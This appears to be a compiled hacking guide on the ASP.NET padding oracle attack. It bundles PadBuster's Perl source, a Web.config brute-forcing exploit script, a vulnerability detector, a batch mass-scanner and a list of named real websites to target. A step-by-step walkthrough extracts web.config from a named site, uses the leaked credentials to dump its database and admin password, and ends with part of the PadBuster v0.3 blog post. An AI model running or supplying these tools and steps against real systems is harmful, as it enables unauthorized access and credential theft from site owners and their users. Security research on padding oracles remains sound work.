} elsif ($plainTextInput) {
# ENCRYPT MODE
&myPrint("INFO: Starting PadBuster Encrypt Mode",0);

# The block count will be the plaintext divided by blocksize (rounded up)
my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);

my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
$plainTextInput.= chr($padCount) x $padCount;

# SampleBytes is the encrypted text you want to derive intermediate values for, so
# copy the current ciphertext block into sampleBytes
# Note, nulls are used if not provided and the intermediate values are brute forced

$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
my $sampleBytes = $forgedBytes;

for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
# IntermediaryBytes is where the intermediate bytes produced by the algorithm
are stored
my $intermediaryBytes;

if ($intermediaryInput && $blockNum == $blockCount) {
$intermediaryBytes = &myDecode($intermediaryInput,2);
} else {
$intermediaryBytes = &processBlock($sampleBytes);
}

# Now XOR the intermediate bytes with the corresponding bytes from the plain-text
block
# This will become the next ciphertext block (or IV if the last one)
$sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) *
$blockSize), $blockSize);
$forgedBytes = $sampleBytes.$forgedBytes;

&myPrint("\nBlock ".($blockNum)." Results:",0);
&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
&myPrint("[+] Intermediate Bytes (HEX):
".&myEncode($intermediaryBytes,1)."\n",0);

}
$forgedBytes = &myEncode($forgedBytes, $encoding);
chomp($forgedBytes);
} else {
# DECRYPT MODE
&myPrint("INFO: Starting PadBuster Decrypt Mode",0);

if ($resumeBlock) {
&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
} else {
$resumeBlock = 1
}

# Assume that the IV is included in our sample and that the first block is the IV
for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++)
{
# Since the IV is the first block, our block count is artificially inflated by one
&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)."
***\n",0);

# SampleBytes is the encrypted text you want to break, so

# lets copy the current ciphertext block into sampleBytes
my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize -
$blockSize), $blockSize);

# IntermediaryBytes is where the the intermediary bytes produced by the
algorithm are stored
my $intermediaryBytes = &processBlock($sampleBytes);

# DecryptedBytes is where the decrypted block is stored
my $decryptedBytes;

# Now we XOR the decrypted byte with the corresponding byte from the previous
block
# (or IV if we are in the first block) to get the actual plain-text
$blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes :
$decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) *
$blockSize), $blockSize);

&myPrint("\nBlock ".($blockNum-1)." Results:",0);
&myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
&myPrint("[+] Intermediate Bytes (HEX):
".&myEncode($intermediaryBytes,1),0);
&myPrint("[+] Plain Text: $decryptedBytes\n",0);
$plainTextBytes = $plainTextBytes.$decryptedBytes;
}
}

&myPrint("-------------------------------------------------------",0);

&myPrint("** Finished ***\n", 0);
if ($plainTextInput) {
&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
} else {
&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
}
&myPrint("-------------------------------------------------------\n",0);

sub determineSignature {
# Help the user detect the oracle response if an error string was not provided
# This logic will automatically suggest the response pattern that occured most often
# during the test as this is the most likeley one

my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys
%oracleGuesses;

&myPrint("The following response signatures were returned:\n",0);
&myPrint("-------------------------------------------------------",0);
if ($useBody) {
&myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
} else {
&myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
}
&myPrint("-------------------------------------------------------",0);

my $id = 1;

foreach (@sortedGuesses) {
my $line = $id;
($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
my @sigFields = split("\t", $_);
$line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
$useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
$line .= "\t$sigFields[2]";
&myPrint($line,0);
&writeFile("Response_Analysis_Signature_".$id.".txt",
$responseFileBuffer{$_});
$id++;
}
&myPrint("-------------------------------------------------------",0);

if ($#sortedGuesses == 0 && !$bruteForce) {
&myPrint("\nERROR: All of the responses were identical.\n",0);
&myPrint("Double check the Block Size and try again.",0);
exit();
} else {
my $responseNum = &promptUser("\nEnter an ID that matches the error
condition\nNOTE: The ID# marked with ** is recommended");
&myPrint("\nContinuing test with selection $responseNum\n",0);
$oracleSignature = $sortedGuesses[$responseNum-1];
}

}

sub prepRequest {
my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;

# Prepare the request
my $testUrl = $pUrl;
my $wasSampleFound = 0;

if ($pUrl =~ /$pSample/) {
$testUrl =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}

my $testPost = "";
if ($pPost) {
$testPost = $pPost;
if ($pPost =~ /$pSample/) {
$testPost =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
}

my $testCookies = "";
if ($pCookie) {
$testCookies = $pCookie;

if ($pCookie =~ /$pSample/) {
$testCookies =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
}

if ($wasSampleFound == 0) {
&myPrint("ERROR: Encrypted sample was not found in the test request",0);
exit();
}
return ($testUrl, $testPost, $testCookies);
}

sub processBlock {
my ($sampleBytes) = @_;
my $analysisMode;
# Analysis mode is either 0 (response analysis) or 1 (exploit)
$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;

# The return value of this subroutine is the intermediate text for the block
my $returnValue;

my $complete = 0;
my $autoRetry = 0;
my $hasHit = 0;

while ($complete == 0) {
# Reset the return value
$returnValue = "";

my $repeat = 0;

# TestBytes are the fake bytes that are pre-pending to the cipher test for the
padding attack
my $testBytes = "\x00" x $blockSize;

my $falsePositiveDetector = 0;

# Work on one byte at a time, starting with the last byte and moving backwards
OUTERLOOP:
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
INNERLOOP:
for (my $i = 255; $i >= 0; $i--) {
# Fuzz the test byte
substr($testBytes, $byteNum, 1, chr($i));

# Combine the test bytes and the sample
my $combinedTestBytes = $testBytes.$sampleBytes;

if ($prefix) {
$combinedTestBytes =
&myDecode($prefix,$encodingFormat).$combinedTestBytes
}

$combinedTestBytes = &myEncode($combinedTestBytes,
$encodingFormat);
chomp($combinedTestBytes);

if (! $noEncodeOption) {
$combinedTestBytes = &uri_escape($combinedTestBytes);
}

my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post,
$cookie, $sample, $combinedTestBytes);

# Ok, now make the request

my ($status, $content, $location, $contentLength) =
&makeRequest($method, $testUrl, $testPost, $testCookies);

my $signatureData = "$status\t$contentLength\t$location";
$signatureData = "$status\t$contentLength\t$location\t$content" if
$useBody;

# If this is the first block and there is no padding error message
defined, then cycle through
# all possible requests and let the user decide what the padding
error behavior is.
if ($analysisMode == 0) {
&myPrint("INFO: No error string was provided...starting
response analysis\n",0) if ($i == 255);

$oracleGuesses{$signatureData}++;

$responseFileBuffer{$signatureData} = "URL:
$testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation:
$location\nContent-Length: $contentLength\nContent:\n$content";

if ($byteNum == $blockSize - 1 && $i == 0) {
&myPrint("*** Response Analysis Complete
***\n",0);
&determineSignature();
$analysisMode = 1;
$repeat = 1;
last OUTERLOOP;
}
}

my $continue = "y";

if (($error && $content !~ /$error/) || ($oracleSignature ne "" &&
$oracleSignature ne $signatureData)) {
# This is for autoretry logic (only works on the first byte)
if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) )
&& $hasHit == 0 ) {
$hasHit++;
} else {
# If there was no padding error, then it worked
&myPrint("[+] Success: (".abs($i-256)."/256) [Byte
".($byteNum+1)."]",0);

&myPrint("[+] Test
Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);

# If continually getting a hit on attempt zero, then
something is probably wrong
$falsePositiveDetector++ if ($i == 255);

if ($interactive == 1) {
$continue = &promptUser("Do you want to
use this value (Yes/No/All)? [y/n/a]","",1);
}

if ($continue eq "y" || $continue eq "a") {
$interactive = 0 if ($continue eq "a");

# Next, calculate the decrypted byte by
XORing it with the padding value
my ($currentPaddingByte,
$nextPaddingByte);

# These variables could allow for flexible
padding schemes (for now PCKS)
# For PCKS#7, the padding block is equal to
chr($blockSize - $byteNum)
$currentPaddingByte = chr($blockSize -
$byteNum);
$nextPaddingByte = chr($blockSize -
$byteNum + 1);

my $decryptedByte = substr($testBytes,
$byteNum, 1) ^ $currentPaddingByte;
&myPrint("[+] XORing with Padding Char,
which is ".&uri_escape($currentPaddingByte),1);

$returnValue =
$decryptedByte.$returnValue;
&myPrint("[+] Decrypted Byte is:
".&uri_escape($decryptedByte),1);

# Finally, update the test bytes in
preparation for the next round, based on the padding used
for (my $k = $byteNum; $k < $blockSize;
$k++) {
# First, XOR the current test byte
with the padding value for this round to recover the decrypted byte
substr($testBytes, $k,
1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));

# Then, XOR it again with the
padding byte for the next round
substr($testBytes, $k,
1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
}
last INNERLOOP;
}

}
}

## TODO: Combine these two blocks?
if ($i == 0 && $analysisMode == 1) {
# End of the road with no success. We should probably try
again.
&myPrint("ERROR: No matching response on [Byte
".($byteNum+1)."]",0);

if ($autoRetry == 0) {
$autoRetry = 1;
&myPrint(" Automatically trying one more
time...",0);
$repeat = 1;
last OUTERLOOP;

} else {
if (($byteNum == $blockSize - 1) && ($error)) {
&myPrint("\nAre you sure you specified the
correct error string?",0);
&myPrint("Try re-running without the -e
option to perform a response analysis.\n",0);
}

$continue = &promptUser("Do you want to start
this block over? (Yes/No)? [y/n/a]","",1);
if ($continue ne "n") {
&myPrint("INFO: Switching to interactive
mode",0);
$interactive = 1;
$repeat = 1;

last OUTERLOOP;
}
}
}
if ($falsePositiveDetector == $blockSize) {
&myPrint("\n*** ERROR: It appears there are false
positive results. ***\n",0);
&myPrint("HINT: The most likely cause for this is an
incorrect error string.\n",0);
if ($error) {
&myPrint("[+] Check the error string you provided
and try again, or consider running",0);
&myPrint("[+] without an error string to perform an
automated response analysis.\n",0);
} else {
&myPrint("[+] You may want to consider defining
a custom padding error string",0);
&myPrint("[+] instead of the automated response
analysis.\n",0);
}
$continue = &promptUser("Do you want to start this block
over? (Yes/No)? [y/n/a]","",1);
if ($continue eq "y") {
&myPrint("INFO: Switching to interactive
mode",0);
$interactive = 1;
$repeat = 1;
last OUTERLOOP;
}

}
}
}
($repeat == 1) ? ($complete = 0) : ($complete = 1);
}
return $returnValue;
}

sub makeRequest {

my ($method, $url, $data, $cookie) = @_;
my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
my $numRetries = 0;
$data ='' unless $data;
$cookie='' unless $cookie;

$requestTracker++;
do {
#Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later
if needed)
$ENV{HTTPS_PROXY} = "";

$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],

);

$req = new HTTP::Request $method => $url;

&myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;

# Add request content for POST and PUTS
if ($data) {
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
}

if ($proxy) {
my $proxyUrl = "http://";
if ($proxyAuth) {
my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
$ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
$ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
$proxyUrl .= $proxyAuth."@";
}
$proxyUrl .= $proxy;
$lwp->proxy(['http'], "http://".$proxy);
$ENV{HTTPS_PROXY} = "http://".$proxy;
}

if ($auth) {
my ($httpuser, $httppass) = split(/:/,$auth);
$req->authorization_basic($httpuser, $httppass);
}

# If cookies are defined, add a COOKIE header
if (! $cookie eq "") {
$req->header(Cookie => $cookie);
}

if ($headers) {
my @customHeaders = split(/;/i,$headers);
for (my $i = 0; $i <= $#customHeaders; $i++) {
my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]);
$req->header($headerName, $headerVal);
}
}

my $startTime = &gettimeofday();
my $response = $lwp->request($req);
my $endTime = &gettimeofday();
$timeTracker = $timeTracker + ($endTime - $startTime);

if ($printStats == 1 && $requestTracker % 250 == 0) {
print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f",
$timeTracker/100).")\n";

$timeTracker = 0;
}
# Extract the required attributes from the response
$status = substr($response->status_line, 0, 3);
$content = $response->content;

&myPrint("Response Content:\n$content",0) if $superVerbose;
$location = $response->header("Location");
if (!$location) {
$location = "N/A";
}
#$contentLength = $response->header("Content-Length");
$contentLength = length($content);

my $contentEncoding = $response->header("Content-Encoding");
if ($contentEncoding) {
if ($contentEncoding =~ /GZIP/i ) {
$content = Compress::Zlib::memGunzip($content);
$contentLength = length($content);
}
}

my $statusMsg = $response->status_line;
#myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);

if ($statusMsg =~ /Can't connect/) {
print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n";
$noConnect = 1;
$numRetries++;
sleep 10;
} else {
$noConnect = 0;
$totalRequests++;
}
} until (($noConnect == 0) || ($numRetries >= 15));
if ($numRetries >= 15) {
&myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
exit;
}
return ($status, $content, $location, $contentLength);
}

sub myPrint {
my ($printData, $printLevel) = @_;
$printData .= "\n";
if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
print $printData;
&writeFile("ActivityLog.txt",$printData);
}
}

sub myEncode {
my ($toEncode, $format) = @_;
return &encodeDecode($toEncode, 0, $format);
}

sub myDecode {
my ($toDecode, $format) = @_;
return &encodeDecode($toDecode, 1, $format);
}

sub encodeDecode {
my ($toEncodeDecode, $oper, $format) = @_;
# Oper: 0=Encode, 1=Decode
# Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken
my $returnVal = "";
if ($format == 1 || $format == 2) {
# HEX
if ($oper == 1) {
#Decode
#Always convert to lower when decoding)
$toEncodeDecode = lc($toEncodeDecode);
$returnVal = pack("H*",$toEncodeDecode);
} else {
#Encode
$returnVal = unpack("H*",$toEncodeDecode);
if ($format == 2) {

#Uppercase
$returnVal = uc($returnVal)
}
}
} elsif ($format == 3) {
# NetUrlToken
if ($oper == 1) {
$returnVal = &web64Decode($toEncodeDecode,1);
} else {
$returnVal = &web64Encode($toEncodeDecode,1);
}
} elsif ($format == 4) {
# Web64
if ($oper == 1) {
$returnVal = &web64Decode($toEncodeDecode,0);
} else {
$returnVal = &web64Encode($toEncodeDecode,0);
}
} else {
# B64
if ($oper == 1) {
$returnVal = &decode_base64($toEncodeDecode);
} else {
$returnVal = &encode_base64($toEncodeDecode);
$returnVal =~ s/(\r|\n)//g;
}

}

return $returnVal;
}

sub web64Encode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input = &encode_base64($input);
$input =~ s/(\r|\n)//g;
$input =~ s/\+/\-/g;
$input =~ s/\//\_/g;
my $count = $input =~ s/\=//g;
$count = 0 if ($count eq "");
$input.=$count if ($net == 1);
return $input;
}

sub web64Decode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input =~ s/\-/\+/g;
$input =~ s/\_/\//g;
if ($net == 1) {
my $count = chop($input);

$input = $input.("=" x int($count));
}
return &decode_base64($input);
}

sub promptUser {
my($prompt, $default, $yn) = @_;
my $defaultValue = $default ? "[$default]" : "";
print "$prompt $defaultValue: ";
chomp(my $input = <STDIN>);

$input = $input ? $input : $default;
if ($yn) {
if ($input =~ /^y|n|a$/) {
return $input;
} else {
&promptUser($prompt, $default, $yn);
}
} else {
if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
return $input;
} else {
&promptUser($prompt, $default);
}
}

}

sub writeFile {
my ($fileName, $fileContent) = @_;
if ($logFiles) {
if ($dirExists != 1) {
system($dirCmd." ".$dirName);
$dirExists = 1;
}
$fileName = $dirName.$dirSlash.$fileName;
open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
print $OUTFILE $fileContent;
close($OUTFILE);
}
}

sub getTime {
my ($format) = @_;
my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) =
localtime(time);
my @months =
("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
$month=sprintf("%02d",$month);
$day=sprintf("%02d",$day);
$hour=sprintf("%02d",$hour);
$minute=sprintf("%02d",$minute);

$second=sprintf("%02d", $second);
$year =~ s/^.//;
if ($format eq "F") {
return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) );
} elsif ($format eq "S") {
return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
} else {
return $hour.":".$minute.":".$second;
}
}
 Web.config_bruter.pl

#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# FOr use this script you need Pudbuster.
# Padbuster is a great tool and Brian Holyfield deserve all the credits.
#
#
# Giorgio Fedon - ([email protected])
#

use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;

#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;

my $testUrl;
my $testBytes;
my $sampleBytes;

my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];

if ($#ARGV < 2) {
die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize

Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to use.
This need to come from Padbuster.
BlockSize = The block size being used by the algorithm (8 or 16)

Poc code by giorgio.fedon\@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science

Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd
d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16

";}

my $method = "GET";

$sampleBytes = encoder($sampleBytes, 1);

my $testBytes = "\x00" x $blockSize;
my $counter = 0;

# Use random bytes
my @nums = (0..255);
my $status = 1;

while ($status)
{
# Fuzz the test bytes

for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
{
substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
}

# Combine the test bytes and the sample
my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
chomp($combinedTestBytes);
$combinedTestBytes =~ s/\%0A//g;

# Ok, now make the request
my ($status, $content, $location, $contentLength) =
makeRequest($method, $testUrl.$combinedTestBytes);

if ($status == "200")
{

# Remove this for "T" exploit
if (index($content,"parent\.Sys\.Application") == -1)
{
print $content."\n\n";
print "Total Requests:".$counter."\n\n";
print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
last;
}
}

$counter++;

}

# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital
Science
#
# I also did the encoder / decoder, but your logic is definitely better

sub encoder
{

my ($toEncodeDecode, $oper) = @_;

# UrlDecoder Encoder

if ($oper == 1)
{
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
}

else

{
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
}

return $returnVal;
}

sub makeRequest {
my ($method, $url) = @_;
my ($lwp, $status, $content, $req, $location, $contentLength);

# Setup LWP UserAgent
$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],
);

$req = new HTTP::Request $method => $url;

my $response = $lwp->request($req);

# Extract the required attributes from the response

$status = substr($response->status_line, 0, 3);

$content = $response->content;
#print $content;
$location = $response->header("Location");

if ($location eq "")
{
$location = "N/A";
}

$contentLength = $response->header("Content-Length");
return ($status, $content, $location, $contentLength);
}

 AspNetPaddingOracleDetector.js [ java Script ]

/*
----------------------------------------
AspNetPaddingOracleDetector for ASP.NET
----------------------------------------
Duncan Smart, http://blog.dotsmart.net/
*/

if (!WScript.FullName.match(/\\cscript\.exe$/i))
{
// Re-run in command prompt
new ActiveXObject("WScript.Shell").Run('cmd.exe /c cscript.exe //E:JScript //nologo "'+
WScript.ScriptFullName +'" & pause')
WScript.Quit(0);
}

var siteRoot;
if (WScript.Arguments.Unnamed.Count != 1) {
WScript.Echo("Enter site URL: ")
siteRoot = WScript.StdIn.ReadLine()
}
else {
siteRoot = WScript.Arguments.Unnamed.Item(0);
}

// Append root slash if neccessary
if (!siteRoot.match("/$"))
siteRoot += "/";

WScript.Echo("Testing site: " + siteRoot);

//TODO: add more tests for other padding oracles
var response1 = httpGet(siteRoot + "webresource.axd?aspxerrorpath=bar");
var response2 = httpGet(siteRoot + "webresource.axd?d=foo&aspxerrorpath=bar");

// Compare HTTP statuses
if (response1.status != response2.status)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP status mismatch");
WScript.Echo("\r\n=== Response 1 ===");
WScript.Echo(response1.status);
WScript.Echo("\r\n=== Response 2 ===");
WScript.Echo(response2.status);
WScript.Quit(1);
}

// Compare headers
if (response1.headers != response2.headers)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP headers mismatch");
WScript.Echo("\r\n=== Response 1 ===");
WScript.Echo(response1.headers);
WScript.Echo("\r\n=== Response 2 ===");
WScript.Echo(response2.headers);
WScript.Quit(1);
}

// Compare HTML
if (response1.body != response2.body)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP body mismatch");
WScript.Echo("=== Response 1 ===");
WScript.Echo(response1.body);
WScript.Echo("");
WScript.Echo("=== Response 2 ===");
WScript.Echo(response2.body);
WScript.Quit(1);
}

WScript.Echo("Site might be OK: WebResource.axd is not acting as a padding oracle");
WScript.Quit(0);

// ====== Utilities ======
function httpGet(url)
{
var http = new ActiveXObject("Microsoft.XMLHTTP");
http.open("GET", url, /*async*/ false);
try {
http.send();
}
catch (err) {
return {'status':null, 'headers':null, 'body':null};
}

var headers = http.getAllResponseHeaders().split(/\r\n/);
// Remove "Date" header as that will likely be different!
headers = filter(headers, function(h){ return !h.match("^Date:") });

return {
status: http.status + " " + http.statusText,
headers: headers.join("\r\n"),
body: http.responseText
};
}

// Filters array to items that satisfy 'where' function
function filter(array, where){
var newArray = [];
for (var i = 0; i < array.length; i++) {
if (where(array[i]))
newArray.push(array[i]);
}
return newArray;
}

 ListSite.txt [ A blank file in which you write th website names ]

Eg. http://moitruongsuckhoe.vn
http://simpleway.vn
http://sieuthi.xuctienthuongmai.vn
http://footballonline.vn
http://hdradio.vn
http://domucgiare.com
 CheckPaddingOracle.bat [ A batch program for checking oracle
vulnerability ]

@echo off
setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (ListSite.txt) do (
cscript //nologo AspNetPaddingOracleDetector.js %%a
echo.
)
cmd

How To :

 Go to any website " asp.net related ". Do reverse ip domain check and find the server and
other sites.

 Copy all sites to notepad and name it as -: ListSite.txt

 Run -: CheckPaddingOracle.bat Script it will check vulnerable website from list.

 Open Vunlerable site and check its sourcecode for :
/WebResource.axd?d=
/ScriptResource.axd?d=

 Sanario I Extracted PaddingOracle.rar have folder that contain all scripts exe.bat,
padBuster.pl, web.config_Bruter.pl now,
 Open -: exe.bat & and run padBuster.pl
 Command -: ..\perl.exe padBuster.pl
http://madeinvietnam.net/WebResource.axd?d=2uT3s0_S0xTW7_RW6mW1q2
2uT3s0_S0xTW7_RW6mW1q2 16 -encoding 3 -plaintext "|||~/web.config"

 Choose ID - 2

 Now, you have Encrypted Value -: T-2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
 Now again construct a command like -:
..\perl.exe Web.Config_Bruter.pl http://madeinvietnam.net/ScriptResource.axd -
2QM86TZAAAAAAAAAAAAAAAAAAAAAA1

 Copy this command to exe.bat and run it.

 You Will Get Resulting Exploit Block : gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0

 Create a link -: http://madeinvietnam.net/ScriptResource.axd?d=
gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0

 Open it in your web browser.
 You will find one XML script now,
 Find Kewword -: connection
 In tht linke you will get Source address , UserID , Password

 Now Open MS Sql and connect to database.

 Now whole database is dumped into your pc or u can say I am connected to there databse
now find admin tables & columns and open it up.
 You can simply right click on adnin table > and select top 1000 rows

 OK you have got your admin and its password now,
 If Password is not encrypted then fine but like our case if password is encrypted then you
have to inersept the password through Brup Suit " OR " If You can Decrypt your password
its Awesome...
 Open -: Brup Suit > proxy > intercept on

PADBUSTER V0.3 AND THE .NET
PADDING ORACLE ATTACK

Now that a weekend has passed since the .NET patch was released, and since there
is already a working public example of how to reliably download a web.config
using the padding oracle attack, we have decided to finally releasev0.3 of
PadBuster with the "Brute Force" option. This option is specifically designed to
handle scenarios where the first block of ciphertext cannot be crafted using CBC-R
due to a secret IV. This feature was NOT designed specifically for the .NET attack,
as our intention for PadBuster is to be a universal tool for identifying and
exploiting padding oracles in any web application. That being said, the brute force
option CAN be used to reliably perform a web.config download attack within a
reasonable number of requests.
Before discussing how to perform this attack using PadBuster, and some of the
other new features in this version, it's worth noting that there are more efficient
ways to perform the web.config download attack using ScriptResource.axd. The T-
Block brute force attack vector, which was originally pointed out to me by James
Martin of ESP Technologies and is also discussed here by Giorgio Fedon of
Minded Security, is significantly faster and more efficient. This technique,
however, is pretty specific to the .NET ScriptResource.axd attack and as such is
not likely to be incorporated into PadBuster (a separate exploit script is probably
warranted).
The web.config attack using PadBuster is essentially a three step process. I will
assume that the reader is already familiar with the specifics of why the script
resource handler is vulnerable to a file download attack. If you are not familiar
with the underlying issue, you can read about it here, here and here.
Step 1: Encrypt the Payload using CBC-R
The first step of the attack is to identify a component that is vulnerable to the
padding oracle attack and use it to encrypt the web.config payload
(|||~/web.config). This can typically be done in a few ways:
1 - Using WebResource.axd as a padding oracle for CBC-R.

If CustomErrors are NOT enabled, then you don't even need a valid ciphertext
sample to exploit the oracle...you can use an encoded dummy value of all NULLS
instead (AAAAAAAAAAAAAAAAAAAAAA2).
padBuster.pl
http://www.myapp.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAA
AA2
AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext
"|||~/web.config"
If CustomErrors ARE enabled, you can still use WebResource.axd as the oracle.
The caveat, however, is that you'll need to use a valid ciphertext query string
sample and use the -prefix option so that PadBuster sends this sample as the prefix
of each test request.
padBuster.pl
http://www.myapp.com/WebResource.axd?d=1s45vAJre3GVd98iQoAjgQ2
1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config"
-prefix 1s45vAJre3GVd98iQoAjgQ2
2 - Using ScriptResource.axd as a padding oracle for CBC-R.
Like with the web resource handler, this is pretty straightforward if CustomErrors
are not enabled:
padBuster.pl
http://www.myapp.com/ScriptResource.axd?d=1s45vAJre3GVd98iQoAjgQ2
1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config"
If CustomErrors ARE enabled, this handler can also be used as a padding oracle.
The interesting thing about this technique is that it seems to work despite
implementing all of the workarounds that Microsoft recommended before the patch
was issued (CustomErrors using RedirectMode and optional Sleep). This
technique, however, requires use of the brute force option so I'll come back to that
in a bit.
Step 2: Verify the encrypted payload does NOT include pipes
This step is optional, but certainly worth performing to ensure that you aren't
headed down a dead end road. In order for the exploit to work, the payload you
send to the handler (including the "garbage" IV block) CANNOT include any pipe
characters. If it does, the payload will never work. To verify this, you can use the
padding oracle to decrypt your payload and verify its contents. So assuming that
Step 1 produced a payload value of

"iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1", then the
following command would be used to verify the contents of the payload. Make
sure to use the -noiv option as the first block is the one you are most interested in.
padBuster.pl
http://www.myapp.com/WebResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAA
AAAA
AAAAAAAAAAAAAA1
iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -
encoding 3 -noiv
So what if your payload DOES include pipes? Not to fear, there's an easy
workaround for this too. You may have noticed that when you decrypt samples
using PadBuster, it prints the HEX encoded Ciphertext Bytes and Intermediate
Bytes with the results of each block. You can optionally use any of these pairs
along with the -ciphertext and -intermediate switches to feed PadBuster a known
pair of ciphertext/intermediate values for use during CBC-R encryption. Using any
one of these pairs to encrypt your exploit payload should produce a different
payload than would otherwise be generated by PadBuster on its own, which can
then be verified to ensure that it does not contain pipes.
Step 3: Brute force the first block
Now that you have a valid payload, the final step is to obtain the first block that
will trigger the file download logic. The reason this step is tricky is that the
Framework typically does not pass an IV along with the ciphertext. As such, we
can't use the padding oracle to reliably produce our desired first block.
The good news is that since you only need the first two bytes of the decrypted
value to trigger our exploit (either Q#,q#,R# or r#) you can essentially brute force
